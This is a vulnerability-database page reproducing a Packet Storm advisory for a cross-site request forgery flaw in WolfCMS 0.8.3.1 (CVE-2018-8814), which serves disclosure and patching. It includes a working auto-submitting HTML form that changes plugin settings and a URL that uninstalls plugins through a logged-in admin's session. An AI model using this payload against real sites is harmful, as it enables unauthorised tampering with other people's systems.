Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSureshbabu NarvaneniPACKETSTORM:147092
HistoryApr 07, 2018 - 12:00 a.m.

WolfCMS 0.8.3.1 Cross Site Request Forgery

2018-04-0700:00:00
Sureshbabu Narvaneni
packetstormsecurity.com
34

0.003 Low

EPSS

Percentile

69.0%

JSON
`#######################################  
# Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery  
# Google Dork: N/A  
# Date: 04-04-2018  
#######################################  
# Exploit Author: Sureshbabu Narvaneni#  
#######################################  
# Author Blog : http://nullnews.in  
# Vendor Homepage: http://www.wolfcms.org  
# Software Link:  
https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip  
# Affected Version: 0.8.3.1  
# Category: WebApps  
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686  
# CVE : CVE-2018-8814  
#  
# 1. Vendor Description:  
#  
# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended  
CMS. Uses MySQL, SQLite or (from 0.7)  
# PostgreSQL for db. Simple drag & drop page hierarchy. Open source,  
licensed under GPLv3.  
#  
# 2. Technical Description:  
#  
# Cross-site request forgery (CSRF) vulnerability in WolfCMS before 0.8.3.1  
allows remote attackers to hijack the  
# authentication of users for requests that modify  
plugin/[pluginname]/settings and can uninstall plugins by sending  
# malicious request.  
#  
# 3. Proof Of Concept:  
#  
# Send below request to logged in user to change the plugin settings.  
#  
#<html>  
# <body>  
# <form action="http://[URL]/wolf/wolfcms/?/admin/plugin/archive/save"  
method="POST">  
# <input type="hidden" name="settings[use_dates]"  
value="1" />  
# <input type="hidden" name="commit" value="Save" />  
# <input type="submit" value="Submit request" />  
# </form>  
# <script>  
# document.forms[0].submit();  
# </script>  
# </body>  
#</html>  
#  
# Share the below URL to uninstall any plugin remotely.  
#  
# http://[url]/wolfcms/?/admin/setting/uninstall_plugin/[pluginname]  
#  
#  
# 4. Solution:  
#  
# Upgrade to latest release.  
# http://www.wolfcms.org/blog.html  
#  
# 5. Reference:  
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814  
# https://github.com/wolfcms/wolfcms/issues/671  
#####################################  
  
`

Related

exploitpack 1
cvelist 1
cve 1
prion 1
osv 1
nvd 1
exploitdb 1
zdt 1
exploitpack
exploitpack
WolfCMS 0.8.3.1 - Cross-Site Request Forgery
2018-04-09 00:00:00
cvelist
cvelist
CVE-2018-8814
2018-04-04 15:00:00
cve
cve
CVE-2018-8814
2018-04-04 15:29:00
prion
prion
Cross site request forgery (csrf)
2018-04-04 15:29:00
osv
osv
CVE-2018-8814
2018-04-04 15:29:00
nvd
nvd
CVE-2018-8814
2018-04-04 15:29:00
exploitdb
exploitdb
WolfCMS 0.8.3.1 - Cross-Site Request Forgery
2018-04-09 00:00:00
zdt
zdt
WolfCMS 0.8.3.1 - Cross Site Request Forgery / Open Redirection Vulnerabilities
2018-04-09 00:00:00

0.003 Low

EPSS

Percentile

69.0%

JSON
Related for PACKETSTORM:147092
exploitpack1cvelist1cve1prion1osv1nvd1exploitdb1zdt1